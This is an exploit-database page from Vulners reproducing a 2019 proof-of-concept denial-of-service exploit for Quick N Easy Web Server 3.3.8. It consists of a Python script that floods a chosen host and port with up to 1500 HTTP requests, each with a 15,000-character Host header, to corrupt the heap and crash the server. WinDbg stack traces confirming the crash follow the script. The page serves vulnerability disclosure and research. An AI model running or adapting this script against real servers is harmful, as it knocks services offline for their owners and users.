Vulners
Lucene search
Quick N Easy Web Server 3.3.8 Denial Of Service
`# Title: Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)
# Date: 2019-12-25
# Author: Cody Winkler
# Vendor Homepage: https://www.pablosoftwaresolutions.com/
# Software Link: https://www.pablosoftwaresolutions.com/html/quick__n_easy_web_server.html
# Version: <= 3.3.8
# Tested on: Windows 10 x64 (wow64)
# CVE: N/A
#!/usr/bin/env python
"""
Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8
[+] Usage: python quickwww_heap338.py <IP> <PORT>
$ python exploit.py 127.0.0.1 80
"""
from __future__ import print_function
import socket
import sys
import re
host = sys.argv[1]
port = int(sys.argv[2])
crashed = r'(503 Service Unavailable)'
http_req = "GET / HTTP/1.1\r\n"
http_req += "Host: " + "A"*15000 + "\r\n" # 50000 A's causes an interesting double free in OLEAUT32!VariantClear() when attached to debugger
http_req += "User-Agent: A\r\n"
http_req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_req += "Accept-Language: en-US,en;q=0.5\r\n"
http_req += "Cookie: A\r\n"
http_req += "Connection: Close\r\n"
http_req += "Upgrade-Insecure-Requests: 0\r\n"
http_req += "Cache-control: max-age=0\r\n\r\n"
def main():
print("[+] Remote Heap Memory Corruption in Quick n Easy Web Server <= 3.3.8")
i = 1
while( i < 1500):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(http_req)
print("[+] Spraying heap with %d 5000-byte requests" % i, end='\r')
sys.stdout.flush()
if re.search(crashed, s.recv(1024)):
print(" "*50)
print("[+] Threads have exited BAADF00D with %d requests!" % i)
s.close()
exit()
s.close()
i = i+1
except Exception, msg:
print("[-] Something went wrong :(")
print(msg)
main()
"""
0:010> kb7
# ChildEBP RetAddr Args to Child
00 06bbf4d4 77ebc1f5 77df50e4 8ae27015 01471640 ntdll!RtlpValidateHeapEntry+0x61114
01 06bbf51c 77e6b325 06bc0048 01471640 772e0f80 ntdll!RtlDebugSizeHeap+0xb3
02 06bbf53c 772e0f9b 013b0000 00000000 06bc0048 ntdll!RtlSizeHeap+0x45775
03 06bbf550 76640be7 773fcf44 06bc0048 00000008 combase!CRetailMalloc_GetSize+0x1b [onecore\com\combase\class\memapi.cxx @ 702]
04 06bbf574 766408cd 06bc0048 01471760 00451f4c OLEAUT32!APP_DATA::FreeCachedMem+0x37
05 06bbf5a8 0041ec27 06bbf5bc 05ec4fe4 05ec4f50 OLEAUT32!VariantClear+0x20d
WARNING: Stack unwind information not available. Following frames may be wrong.
06 06bbf5c4 766408cd 76cd0008 0907a724 01471254 quickweb+0x1ec27
0:010> !analyze -v
<SNIP>
STACK_TEXT:
00000000 00000000 heap_corruption!quickweb.exe+0x0
SYMBOL_NAME: heap_corruption!quickweb.exe
MODULE_NAME: heap_corruption
IMAGE_NAME: heap_corruption
STACK_COMMAND: ** Pseudo Context ** ManagedPseudo ** Value: 7ba5870 ** ; kb
FAILURE_BUCKET_ID: HEAP_CORRUPTION_80000003_heap_corruption!quickweb.exe
OS_VERSION: 10.0.17763.1
BUILDLAB_STR: rs5_release
OSPLATFORM_TYPE: x86
OSNAME: Windows 10
FAILURE_ID_HASH: {68efeb37-77bb-f968-fc16-9a1fba88436f}
"""
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2020 00:00Current